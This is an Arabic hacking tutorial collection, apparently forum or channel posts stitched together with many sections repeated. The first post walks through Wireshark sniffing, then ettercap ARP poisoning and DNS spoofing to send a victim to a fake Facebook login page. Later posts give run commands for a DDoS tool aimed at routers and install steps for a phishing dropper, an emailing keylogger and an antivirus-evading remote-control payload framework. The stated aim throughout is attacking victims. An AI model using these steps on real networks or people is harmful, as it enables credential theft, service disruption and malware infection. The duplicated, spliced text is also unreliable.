اليوم سوف أقوم بشرح عن أداة تحليل البروتوكولات وكيف يتم تحليلها واستغلالها
بدايةً سوف نتكلم عن البروتوكول وهو...
هو بروتوكول الاتصال الأساسي في حزمة بروتوكولات الإنترنت ويُشكّل الأساس الذي تعتمد عليه عمليّة توجيه الرزم (Routing) ضمن الشبكة، ويسمح ذلك بالاتصال بين الشبكات المُختلفة، وهذا هو جوهر شبكة الإنترنت.
اي أنهُ بإختصار مثل الوسيط بينك وبين الشبكة حتى تستطيع الحصول على ما تُريد وهُناك العديد من البروتوكولات ولكل بروتوكول مهمة خاصّة به....
لنبدأ الشرح...
#Tools :
+ Wireshark
+ Bettercap
#Steps :
1- سوف نقوم بتشغيل أداة تحليل البروتوكولات وهكذا سوف يكون تم إجتياز أول شئ من الشرح....
# لتشغيل الأداة يوجد طريقتين....
- كتابة wireshark داخل التيرمنال
- نذهب إلى
Application => => wireshark
# سوف تظهر لنا واجهة بها إختيار interface الخاص بنا يمكنك إختيار eth0 أو wlan0 حسب الذي تعمل به
# سوف تظهر لنا نافذة الأداة ومن هُنا نبدأ في تحليل البروتوكولات.....
لنتابع معاً....
2- بعد أن تظهر لنا نافذة الأداة سيظهر لنا العديد من الأشياء ولكن بالطبع لن نفهم شئ لذا لنفهم مع بعض كِل شئ...
سوف أترك صورة توّضح ما أتكلم عنه في الأسفل وسوف تجدوا أرقام وهي التي توّضح ما أتكلم عنه هُنا....
#1- ستجد كلمة مخفية مثل هذه....
Apply a display filter __ <Ctrl-/>
وهي تعني فلترة الأشياء التي تظهر لك وهي مثل موجه الأوامر الخاص بالأداة وسنفهم هذا لاحقاً....
#2- شريط المهام وبه كُلاً من....
No. Time
وهي تعني برقم العملية وبجانبه الوقت وتظهر لك بالشكل التالي...
1 0.000000000
2 0.157298626
Source
وهي تعني بالمصدر الذي يأتي منهُ المعلومات والمقصود بها الأي بي الداخلي ويكون مثل هذا....
192.168.1.4
Destination
ستجد العديد من الأيبيات ولكن ستجد أيضاً الأي بي الذي قام بالإتصال عبرهُ...
Protocol
وهذه تعني البروتوكول المُستخدم وستجد العديد من البروتوكولات مثل....
DNS
UDP
TCP
info
وهذه تعني إتصل بماذا؟....
فمثلاً إذا كان البروتوكول الذي قُمنا باستغلاله هو DNS ستجد بعض الأشياء وبالنهاية إسم الموقع أو DNS الخاص بالشئ الذي إتصل به....
حسناً لنرى ما يُمكننا فعله....
سنقوم بفلترة الأشياء عبر الذي شرحته أول شئ الذي يُسمى filter...
سنقوم بوضع الشئ الذي نقوم بتحليل مثل البروتوكول وسوف نستخدم بروتوكول DNS ونقوم بتحليله لنرى كيف ذلك....
نكتب بالفراغ هذا فقط ثلاثة أحرف وهما...
# dns
وعندما يتصل أي أحد داخل الشبكة بأي شئ عبر هذا البروتوكول ستجد الأي بي الخاص به بالأهداف التي قام بزيارتها وكُل شئ وهكذا قد إنتهينا من تحليل البروتوكولات ويمكنك إضافة أي بروتوكول تُريده بدل dns ويمكنك إضافة أي بي مُعين أيضاً عبر كتابة الأمر التالي...
# ip.addr == الأي بي الذي تُريده
وإذا أردت تحليل بروتوكول مُعين نكتب التالي....
# ip.addr == الأي بي الذي تُريده && dns
أو يُمكنك إختيار البروتوكول الذي تُريده...
3- نأتي لكيفية الإستغلال وهُنا سوف نستخدم أداة ettercap....
# لتشغيل الأداة يوجد طريقتين أيضاً
ولكن سوف نستخدم الطريقة الأتية...
# Application => Sniff & Spoof => ettercap-gui
ولكن قبل هذا يجب علينا تعديل بعض الأشياء حتى تعمل معنا الأداة جيداً....
نكتب الأمر التالي داخل التيرمنال...
# gedit /etc/ettercap/etter.conf
ستجد كلمتي
ec_uid ==> x
ec_gid ==> x
وهذا الحرف يعني رقم عليك بتغييرها إلى رقم 0 هكذا....
ec_uid ==> 0
ec_gid ==> 0
وقُم بالبحث قليلاً عن كلمة root ستجد الأتي....
#---------------
# Linux
#---------------
# ,,,,,,,, iptables
وستجد الكلمات التالية
#redir_command_on
#redir_command_off
قُم بحذف علامة الهاش هكذا....
redir_command_on
redir_command_off
نقوم بالتعديل على ملف dns حتى نقوم بعمل إعادة توجيه للرابط الذي نُريده...
سوف أُكمل وكأننا سوف نقوم بإستغلال dns
لإعادة التوجيه لرابط خبيث به تسجيل دخول إلى فيسبوك ولكي نفعل هذا سنقوم بعمل إضافة dns
الخاص بموقع فيسبوك داخل الملف وبجانبه سنضع أي بي الرابط الخاص بنا...
نكتب التالي بالتيرمنال...
# gedit /etc/ettercap/etter.dns
سنجد كلمة microsoft sucks
وبعدها روابط مثل...
microsoft.com
*.microsoft.com
www.microsoft.com
نقوم بتغيير microsoft
إلى الرابط الذي نُريد عمل تجسس عليه
وبجانبه سنجد أي بي سنقوم بتغييرها إلى أي بي أو هوست الرابط....
الأن سنبدأ الإستغلال...
# بعد تشغيل الأداة نختار
# Sniff
نختار
Unfied sniffing
# Hosts
نختار
scan for hosts
# Hosts
نختار منها Hosts list
ليظهر لنا الأهداف
وبعد أن نختار الهدف نقوم بتحديده
Add to Target 2
ونقوم بتحديد أي بي الراوتر
Add to Target 1
# Target
نختار
Current Targets
# Mitm
نختار
Arp Poisoning
ونختار
بدايةً سوف نتكلم عن البروتوكول وهو...
هو بروتوكول الاتصال الأساسي في حزمة بروتوكولات الإنترنت ويُشكّل الأساس الذي تعتمد عليه عمليّة توجيه الرزم (Routing) ضمن الشبكة، ويسمح ذلك بالاتصال بين الشبكات المُختلفة، وهذا هو جوهر شبكة الإنترنت.
اي أنهُ بإختصار مثل الوسيط بينك وبين الشبكة حتى تستطيع الحصول على ما تُريد وهُناك العديد من البروتوكولات ولكل بروتوكول مهمة خاصّة به....
لنبدأ الشرح...
#Tools :
+ Wireshark
+ Bettercap
#Steps :
1- سوف نقوم بتشغيل أداة تحليل البروتوكولات وهكذا سوف يكون تم إجتياز أول شئ من الشرح....
# لتشغيل الأداة يوجد طريقتين....
- كتابة wireshark داخل التيرمنال
- نذهب إلى
Application => => wireshark
# سوف تظهر لنا واجهة بها إختيار interface الخاص بنا يمكنك إختيار eth0 أو wlan0 حسب الذي تعمل به
# سوف تظهر لنا نافذة الأداة ومن هُنا نبدأ في تحليل البروتوكولات.....
لنتابع معاً....
2- بعد أن تظهر لنا نافذة الأداة سيظهر لنا العديد من الأشياء ولكن بالطبع لن نفهم شئ لذا لنفهم مع بعض كِل شئ...
سوف أترك صورة توّضح ما أتكلم عنه في الأسفل وسوف تجدوا أرقام وهي التي توّضح ما أتكلم عنه هُنا....
#1- ستجد كلمة مخفية مثل هذه....
Apply a display filter __ <Ctrl-/>
وهي تعني فلترة الأشياء التي تظهر لك وهي مثل موجه الأوامر الخاص بالأداة وسنفهم هذا لاحقاً....
#2- شريط المهام وبه كُلاً من....
No. Time
وهي تعني برقم العملية وبجانبه الوقت وتظهر لك بالشكل التالي...
1 0.000000000
2 0.157298626
Source
وهي تعني بالمصدر الذي يأتي منهُ المعلومات والمقصود بها الأي بي الداخلي ويكون مثل هذا....
192.168.1.4
Destination
ستجد العديد من الأيبيات ولكن ستجد أيضاً الأي بي الذي قام بالإتصال عبرهُ...
Protocol
وهذه تعني البروتوكول المُستخدم وستجد العديد من البروتوكولات مثل....
DNS
UDP
TCP
info
وهذه تعني إتصل بماذا؟....
فمثلاً إذا كان البروتوكول الذي قُمنا باستغلاله هو DNS ستجد بعض الأشياء وبالنهاية إسم الموقع أو DNS الخاص بالشئ الذي إتصل به....
حسناً لنرى ما يُمكننا فعله....
سنقوم بفلترة الأشياء عبر الذي شرحته أول شئ الذي يُسمى filter...
سنقوم بوضع الشئ الذي نقوم بتحليل مثل البروتوكول وسوف نستخدم بروتوكول DNS ونقوم بتحليله لنرى كيف ذلك....
نكتب بالفراغ هذا فقط ثلاثة أحرف وهما...
# dns
وعندما يتصل أي أحد داخل الشبكة بأي شئ عبر هذا البروتوكول ستجد الأي بي الخاص به بالأهداف التي قام بزيارتها وكُل شئ وهكذا قد إنتهينا من تحليل البروتوكولات ويمكنك إضافة أي بروتوكول تُريده بدل dns ويمكنك إضافة أي بي مُعين أيضاً عبر كتابة الأمر التالي...
# ip.addr == الأي بي الذي تُريده
وإذا أردت تحليل بروتوكول مُعين نكتب التالي....
# ip.addr == الأي بي الذي تُريده && dns
أو يُمكنك إختيار البروتوكول الذي تُريده...
3- نأتي لكيفية الإستغلال وهُنا سوف نستخدم أداة ettercap....
# لتشغيل الأداة يوجد طريقتين أيضاً
ولكن سوف نستخدم الطريقة الأتية...
# Application => Sniff & Spoof => ettercap-gui
ولكن قبل هذا يجب علينا تعديل بعض الأشياء حتى تعمل معنا الأداة جيداً....
نكتب الأمر التالي داخل التيرمنال...
# gedit /etc/ettercap/etter.conf
ستجد كلمتي
ec_uid ==> x
ec_gid ==> x
وهذا الحرف يعني رقم عليك بتغييرها إلى رقم 0 هكذا....
ec_uid ==> 0
ec_gid ==> 0
وقُم بالبحث قليلاً عن كلمة root ستجد الأتي....
#---------------
# Linux
#---------------
# ,,,,,,,, iptables
وستجد الكلمات التالية
#redir_command_on
#redir_command_off
قُم بحذف علامة الهاش هكذا....
redir_command_on
redir_command_off
نقوم بالتعديل على ملف dns حتى نقوم بعمل إعادة توجيه للرابط الذي نُريده...
سوف أُكمل وكأننا سوف نقوم بإستغلال dns
لإعادة التوجيه لرابط خبيث به تسجيل دخول إلى فيسبوك ولكي نفعل هذا سنقوم بعمل إضافة dns
الخاص بموقع فيسبوك داخل الملف وبجانبه سنضع أي بي الرابط الخاص بنا...
نكتب التالي بالتيرمنال...
# gedit /etc/ettercap/etter.dns
سنجد كلمة microsoft sucks
وبعدها روابط مثل...
microsoft.com
*.microsoft.com
www.microsoft.com
نقوم بتغيير microsoft
إلى الرابط الذي نُريد عمل تجسس عليه
وبجانبه سنجد أي بي سنقوم بتغييرها إلى أي بي أو هوست الرابط....
الأن سنبدأ الإستغلال...
# بعد تشغيل الأداة نختار
# Sniff
نختار
Unfied sniffing
# Hosts
نختار
scan for hosts
# Hosts
نختار منها Hosts list
ليظهر لنا الأهداف
وبعد أن نختار الهدف نقوم بتحديده
Add to Target 2
ونقوم بتحديد أي بي الراوتر
Add to Target 1
# Target
نختار
Current Targets
# Mitm
نختار
Arp Poisoning
ونختار
بعدها
✔️ Sniff remote connections.
# Plugins
ونختار
dns_spoof
# Sniff
نختار
Start Sniffing
وعندما يتم دخول الضحية إلى موقع فيسبوك سيجد صفحة تسجيل الدخول خاصّتك وهُنا ينتهي الشرح وهذا شئ بسيط بالنسبة لإستغلال مثل هذه البروتوكولات فيُمكنك فعل كُل شئ تُريده
وإن كان هُناك توفيق فمن الله وإذا كان خطأ فمني ومن الشيطان...
# هذا الشرح إهداء إلى كُل من ...
#CS_Princess
#VenomX_Team
# ومُقدم من....
#CS_Princess
#CrTVenom
✔️ Sniff remote connections.
# Plugins
ونختار
dns_spoof
# Sniff
نختار
Start Sniffing
وعندما يتم دخول الضحية إلى موقع فيسبوك سيجد صفحة تسجيل الدخول خاصّتك وهُنا ينتهي الشرح وهذا شئ بسيط بالنسبة لإستغلال مثل هذه البروتوكولات فيُمكنك فعل كُل شئ تُريده
وإن كان هُناك توفيق فمن الله وإذا كان خطأ فمني ومن الشيطان...
# هذا الشرح إهداء إلى كُل من ...
#CS_Princess
#VenomX_Team
# ومُقدم من....
#CS_Princess
#CrTVenom
السلام عليكم
موضوعنا هو. الهجوم على شبكات الوايفاي
باداه قويه ومجربه
https://github.com/4L13199/LITEDDOS
cd LITEDDOS
لكي نشغلها
الامر.
python2 LITEDDOS.py (ip router)80 (عدد الهجمات)
DARK MAN-----CH
موضوعنا هو. الهجوم على شبكات الوايفاي
باداه قويه ومجربه
https://github.com/4L13199/LITEDDOS
cd LITEDDOS
لكي نشغلها
الامر.
python2 LITEDDOS.py (ip router)80 (عدد الهجمات)
DARK MAN-----CH
GitHub
GitHub - 4L13199/LITEDDOS: This Tool Is Supporting For DDOS Activities, The Way Is Typing Command : $ python2 islddos.py <ip>…
This Tool Is Supporting For DDOS Activities, The Way Is Typing Command : $ python2 islddos.py <ip> <port> <packet> example: $python2 islddos.py 104.27....
1- اداه Umbrella
git clone https://github.com/4w4k3/Umbrella.git
cd Umbrella
sudo su
chmod +x install.sh
./install.sh
python umbrella.py
مميزات الاداه
Download executable on target system.
Silent execution.
Download and execute executable once time.
If the exe already had downloaded and running, open only pdf/docx/xxls/jpg/png.
Some Phishing methods are included.
Multiple Session disabled.
Bypass UAC.
#CS
git clone https://github.com/4w4k3/Umbrella.git
cd Umbrella
sudo su
chmod +x install.sh
./install.sh
python umbrella.py
مميزات الاداه
Download executable on target system.
Silent execution.
Download and execute executable once time.
If the exe already had downloaded and running, open only pdf/docx/xxls/jpg/png.
Some Phishing methods are included.
Multiple Session disabled.
Bypass UAC.
#CS
GitHub
GitHub - 4w4k3/Umbrella: A Phishing Dropper designed to Pentest.
A Phishing Dropper designed to Pentest. Contribute to 4w4k3/Umbrella development by creating an account on GitHub.
2- اداه BeeLogger
اوامر تثبيتها
git clone https://github.com/4w4k3/BeeLogger.git
cd BeeLogger
sudo su
chmod +x install.sh
./install.sh
python bee.py
مميزات الاداه
Send logs each 120 seconds.
Send logs when chars > 50.
Send logs with GMAIL.
Some Phishing methods are included.
Multiple Session disabled.
Auto Persistence.
#CS
اوامر تثبيتها
git clone https://github.com/4w4k3/BeeLogger.git
cd BeeLogger
sudo su
chmod +x install.sh
./install.sh
python bee.py
مميزات الاداه
Send logs each 120 seconds.
Send logs when chars > 50.
Send logs with GMAIL.
Some Phishing methods are included.
Multiple Session disabled.
Auto Persistence.
#CS
GitHub
GitHub - 4w4k3/BeeLogger: Generate Gmail Emailing Keyloggers to Windows.
Generate Gmail Emailing Keyloggers to Windows. Contribute to 4w4k3/BeeLogger development by creating an account on GitHub.
3- اداه Insanity-Framework
اوامر تثبيتها
git clone https://github.com/4w4k3/Insanity-Framework
cd Insanity-Framework
chmod +x install.sh
./install.sh
مميزات الاداه
Bypass most AV and Sandboxes.
Remote Control.
Payload Generation.
Some Phishing methods are included on payloads generated.
Detect Virtual Machines.
Multiple Session disabled.
Persistence and others features can be enabled.
Bypass UAC.
Memory Injection.
#CS
اوامر تثبيتها
git clone https://github.com/4w4k3/Insanity-Framework
cd Insanity-Framework
chmod +x install.sh
./install.sh
مميزات الاداه
Bypass most AV and Sandboxes.
Remote Control.
Payload Generation.
Some Phishing methods are included on payloads generated.
Detect Virtual Machines.
Multiple Session disabled.
Persistence and others features can be enabled.
Bypass UAC.
Memory Injection.
#CS
GitHub
GitHub - 4w4k3/Insanity-Framework: Generate Payloads and Control Remote Machines. [Discontinued]
Generate Payloads and Control Remote Machines. [Discontinued] - 4w4k3/Insanity-Framework
4- اداه py2exe
اداه الهندسة العكسية لتطبيقات py2exe.
اوامر تثبيتها
git clone https://github.com/4w4k3/rePy2exe.git
python rePy2exe.py
#CS
اداه الهندسة العكسية لتطبيقات py2exe.
اوامر تثبيتها
git clone https://github.com/4w4k3/rePy2exe.git
python rePy2exe.py
#CS
GitHub
GitHub - 4w4k3/rePy2exe: A Reverse Engineering Tool for py2exe applications.
A Reverse Engineering Tool for py2exe applications. - 4w4k3/rePy2exe
5- اداه KnockMail
git clone https://github.com/4w4k3/KnockMail.git
cd KnockMail
sudo su
pip install -r requeriments.txt
python knock.py
مميزاتها بالصورة بالاسفل
#CS
git clone https://github.com/4w4k3/KnockMail.git
cd KnockMail
sudo su
pip install -r requeriments.txt
python knock.py
مميزاتها بالصورة بالاسفل
#CS
GitHub
GitHub - 4w4k3/KnockMail: Verify if email exists
Verify if email exists. Contribute to 4w4k3/KnockMail development by creating an account on GitHub.